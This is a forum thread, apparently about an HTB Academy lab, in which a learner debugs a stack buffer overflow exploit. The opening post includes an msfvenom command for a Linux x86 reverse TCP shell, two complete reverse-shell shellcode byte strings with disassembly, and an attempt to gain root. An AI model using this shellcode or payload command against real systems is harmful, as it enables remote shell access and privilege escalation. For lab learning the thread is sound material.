Shellcode crashes after made connection to netcat in Stack-base buffer overflow tutorial

I’ve been stuck for 5 days at last step of Skills assessment at the end of the STACK-BASED BUFFER OVERFLOWS ON LINUX X86. I managed to overwrite the return address and the jump to the shell code at 0xffffcd0d. The netcat does tell me it got connection from the shellcode. However, the program crashed right after that:

Program received signal SIGSEGV, Segmentation fault.
0xffffcd58 in ?? ()

(gdb) x/95i 0xffffcd0d
0xffffcd0d: fcmovnb st,st(0)
0xffffcd0f: fnstenv [esp-0xc]
0xffffcd13: pop edx
0xffffcd14: sub ecx,ecx
0xffffcd16: mov cl,0x12
0xffffcd18: mov esi,0x85e358f0
0xffffcd1d: xor DWORD PTR [edx+0x17],esi
0xffffcd20: add esi,DWORD PTR [edx+0x17]
0xffffcd23: xor DWORD PTR [edx],0x5c
0xffffcd26: add DWORD PTR [eax-0x7d],esi
0xffffcd29: xchg BYTE PTR [edx],dh
0xffffcd2b: cwde
0xffffcd2c: mov al,0x7b
0xffffcd2e: out dx,al
0xffffcd2f: xor eax,0x7af1f534
0xffffcd34: pop esi
0xffffcd35: enter 0xe972,0xc7
0xffffcd39: bound ecx,QWORD PTR [ebp-0x3d]
0xffffcd3c: ja 0xffffcd09
0xffffcd3e: retf
0xffffcd3f: and bl,BYTE PTR [edi]
0xffffcd41: mov bl,0x2b
0xffffcd43: aad 0xde
0xffffcd45: and ebp,DWORD PTR [esi]
0xffffcd47: aad 0x9a
0xffffcd49: fisub DWORD PTR [edi-0x178415cc]
0xffffcd4f: out 0x59,eax
0xffffcd51: aaa
0xffffcd52: or eax,DWORD PTR [ecx-0x3c730544]
0xffffcd58: push esi
0xffffcd59: imul esp,DWORD PTR [edx-0x6ce43170],0x79
0xffffcd60: ins BYTE PTR es:[edi],dx
0xffffcd61: mov ch,0x62
0xffffcd63: data16 and dl,BYTE PTR [esi]
0xffffcd66: cld
0xffffcd67: mov BYTE PTR [edx-0x6d],dh
0xffffcd6a: xor ecx,edx

(gdb) info registers
eax 0x0 0
ecx 0xffffcd58 -12968
edx 0x0 0
ebx 0x3 3
esp 0xffffcd54 0xffffcd54
ebp 0xca339372 0xca339372
esi 0x16bd 5821
edi 0x0 0
eip 0xffffcd58 0xffffcd58
eflags 0x10296 [ PF AF SF IF RF ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x63 99

One thing I observed is: the shell code access memory with weird offsets that come from nowhere, e.g

   fisub  DWORD PTR [edi-0x178415cc]
   or  eax,DWORD PTR [ecx-0x3c730544]
   imul   esp,DWORD PTR [edx-0x6ce43170],0x79

I have no idea how this can work. I know there’s some kind of encoding, butl
The shell code was generated by:

msfvenom -p linux/x86/shell_reverse_tcp lhost=127.0.0.1 lport=31337 --format c --arch x86 --platform linux --bad-chars “\x00\x09\x0a\x20” --out shellcode

Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 95 (iteration=0)
x86/shikata_ga_nai chosen with final size 95
Payload size: 95 bytes
Final size of c file: 425 bytes
Saved as: shellcode

This is the content of the shellcode in C string:

“\xdb\xc0\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1\x12\xbe\xf0\x58\xe3”
“\x85\x31\x72\x17\x03\x72\x17\x83\x32\x5c\x01\x70\x83\x86\x32”
“\x98\xb0\x7b\xee\x35\x34\xf5\xf1\x7a\x5e\xc8\x72\xe9\xc7\x62”
“\x4d\xc3\x77\xcb\xcb\x22\x1f\xb3\x2b\xd5\xde\x23\x2e\xd5\x9a”
“\xda\xa7\x34\xea\x7b\xe8\xe7\x59\x37\x0b\x81\xbc\xfa\x8c\xc3”
“\x56\x6b\xa2\x90\xce\x1b\x93\x79\x6c\xb5\x62\x66\x22\x16\xfc”
“\x88\x72\x93\x33\xca”;


I then tried another approach: generate shellcode without the --bad-characters parameter:

“\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\x7f\x00\x00\x01\x68\x02\x00\x7a\x69\x89\xe1\xb0\x66\x50\x51\x53\xb3\x03\x89\xe1\xcd\x80\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80”

00000000 31DB xor ebx,ebx
00000002 F7E3 mul ebx
00000004 53 push ebx
00000005 43 inc ebx
00000006 53 push ebx
00000007 6A02 push byte +0x2
00000009 89E1 mov ecx,esp
0000000B B066 mov al,0x66
0000000D CD80 int 0x80
0000000F 93 xchg eax,ebx
00000010 59 pop ecx
00000011 B03F mov al,0x3f
00000013 CD80 int 0x80
00000015 49 dec ecx
00000016 79F9 jns 0x11
00000018 687F000001 push dword 0x100007f
0000001D 6802007A69 push dword 0x697a0002
00000022 89E1 mov ecx,esp
00000024 B066 mov al,0x66
00000026 50 push eax
00000027 51 push ecx
00000028 53 push ebx
00000029 B303 mov bl,0x3
0000002B 89E1 mov ecx,esp
0000002D CD80 int 0x80
0000002F 52 push edx
00000030 686E2F7368 push dword 0x68732f6e
00000035 682F2F6269 push dword 0x69622f2f
0000003A 89E3 mov ebx,esp
0000003C 52 push edx
0000003D 53 push ebx
0000003E 89E1 mov ecx,esp
00000040 B00B mov al,0xb
00000042 CD80 int 0x80

I then inject this shellcode into the process memory during gdb session. it works as expected except one thing: the setresuid() fails when run under gdb, i cannot get root. To be able to get the root, i need to run the program from terminal. However, in this case, the later shellcode cannot be fed to the program at command line (no gdb) because it contains bad characters (0x00).

Could anyone please help to explain why the shellcode generated with --bad-characters does not work? What’s the proper way I need to do?

Thank

nvm, i found the issue and passed the assessment. It was due to memory overwriting. It turned out that the way to form the buffer of 0x55, NOP and shellcode in the course itself is totally WRONG.

Hi @toannds. I think I may be in your same situation. Can you clarify how you prepared the right buffer? (DM me if you want)

@toannds nvm, was a problem with the msfvenom shellcode

Hi, i’m stuck on this one too, i (think) i got all the steps BUT cant connect to the reverse >shell, i’m doing it via ssh on the htb academy machine. Any help would be nice.

It worked, but i’m still trying to get root.

@PWR2DPPL Have you got root access ?